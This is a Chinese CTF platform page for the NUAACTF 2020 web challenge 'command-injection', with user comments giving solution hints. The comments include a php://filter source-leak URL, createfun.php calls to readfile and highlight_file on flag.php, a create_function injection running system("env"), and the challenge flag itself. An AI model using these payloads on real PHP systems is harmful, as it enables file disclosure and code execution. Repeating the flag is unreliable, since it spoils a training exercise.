command-injectionWEB 未解决

分数: 0 金币: 0
所属赛事: NUAACTF 2020
题目作者: 未知
一  血: tzzzez
一血奖励: 0金币
解  决: 297
提  示:
描  述:
nuaactf{}
评论
solomom 2月前

csdn

回复 0

smtall 9月前

createfun.php?func=highlight_file&arg=flag.php

回复 0

vincentshine 1年前

不知道为啥 http://82.157.146.43:10618/include.php?file=index 可以 显示出来,http://82.157.146.43:10618/include.php?file=createfun就不行

回复 0

xiaobai568 1年前

createfun.php?func=readfile&arg=flag.php,php查看文件的函数都可以试试

回复 0

coolsword2023 2年前

createfun.php?func=create_function&&arg=){}system("env");//

回复 0
xiaoxiao972521 1年前

这个角度清奇哎,我是createfun.php?func=readfile&arg=flag.php

回复 0

zhaiye 2年前

nuaactf{php_IS_thE_best_language}

回复 0

justsosoloveyou 2年前

html注释,cookie,/include.php?file=php://filter/read=convert.base64-encode/resource=createfun, /createfun.php?func=highlight_file&arg=flag.php

回复 2

hopeinhand 2年前

注释有一个include.php,访问发现有文件包含,调出源码后提示createfun.php,发现可以执行自定义函数,show_source flag.php

回复 5

WriteUp

image
2901600657

3 金币

评分(1)

解题动态

2790819062 攻破了该题 5天前
意料之中是戏 攻破了该题 7天前
GNMO 攻破了该题 12天前
jiubanyipeng 攻破了该题 12天前
2kniden 攻破了该题 18天前
jackandtom 攻破了该题 1月前
d2pq2 攻破了该题 1月前
omango 攻破了该题 1月前
绪言qaq 攻破了该题 1月前
Air51930 攻破了该题 1月前
luck1219 攻破了该题 1月前
18270753375 攻破了该题 1月前
Zpfhh 攻破了该题 1月前
1348931180 攻破了该题 1月前
hbynb 攻破了该题 2月前
minz 攻破了该题 2月前
aboic 攻破了该题 2月前
eason2023 攻破了该题 2月前
zrc2682 攻破了该题 2月前
Ethan552525 攻破了该题 2月前
问题反馈